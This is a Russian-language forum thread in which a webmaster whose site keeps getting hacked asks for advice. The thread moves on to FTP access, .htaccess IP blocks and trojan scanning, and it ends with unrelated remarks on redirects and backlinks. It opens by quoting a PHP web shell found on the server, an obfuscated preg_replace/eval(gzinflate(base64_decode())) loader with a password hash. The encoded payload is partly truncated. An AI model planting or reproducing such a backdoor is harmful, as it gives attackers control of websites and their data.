нашел в подкаталоге файл index.php следующего содержания, это могло быть проблемой?
<?php
$auth_pass = "d61875a33e449c5c705e71b50a57cdd6";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'5b1pdxrHEjD82fec+x9aE24GYoQA2bkOEli2LNlybMnR4lV+yAADTDQwZGYQkh3996eqepnuWRCyk/u......................................6hJN6vv+H4XL9FdLFUEiippqKn6fwE='\x29\x29\x29\x3B",".");?>
только что опять взломали, дак что? менять хостера? подскажите куда переезжать тогда
в общем, вредоносный код я удалил, пароли сменил, но не думаю, что проблема решена.
У хостера нет возможности открыть доступ только для выборочных ip, хотя эта идея мне очень понравилась. А по поводу shell, я запретил его в cpanel. (никогда не пользовался).
Может есть смысл сменить хостера, чтобы сделать запрет на ftp?
можно поподробней?
спасибо за идею, попробую так поступить. тогда, по идеи, даже при заражении трояном никто кроме меня не смоет заходить на фтп
выяснил, что вот это я получается сделал сам, когда запрещал доступ по ip в cpanel
<Files 403.shtml>
order allow,deny
allow from all
</Files>
deny from 46.109.207.52
deny from 2.61.66.44
тогда получается, что взламывают только 1 сайт на хостинге. и размещают код в шаблоны, это, насколько я понимаю, можно сделать только имея фтп доступ, ибо админки у меня нету.
Думаю нужно проверить комп на трояны, какая утилита пригодна для этого?
скрипты на сайте соотвественно есть, 2 сайта на самописных системах + 1 на дле.
хостер best-hosting.ru
пароли неоднократно менял на почту и на панель управления счетами, но в панель никто кроме меня не заходит (ибо стоит уведомление на почту)
локальный комп сканировал, но возможно недостаточно - посоветуйте хорошую софтину.
Какие логи стоит смотреть в первую очередь?
этот вариант работает немного не так, как нужно, дело в том, что на старом сайте установлен mod_rewrite, и при таком редиректе меня переносит со страницы старый-домен.ру/d.php на страницу новый-домен.ру/_letters.php?letter=d, а нужно организовать перевод на новый-домен.ру/d.php
такая же ситуация, бэки x2
такая же ситуация, сайту пол года, ВС -5 штук. и дали пр 3
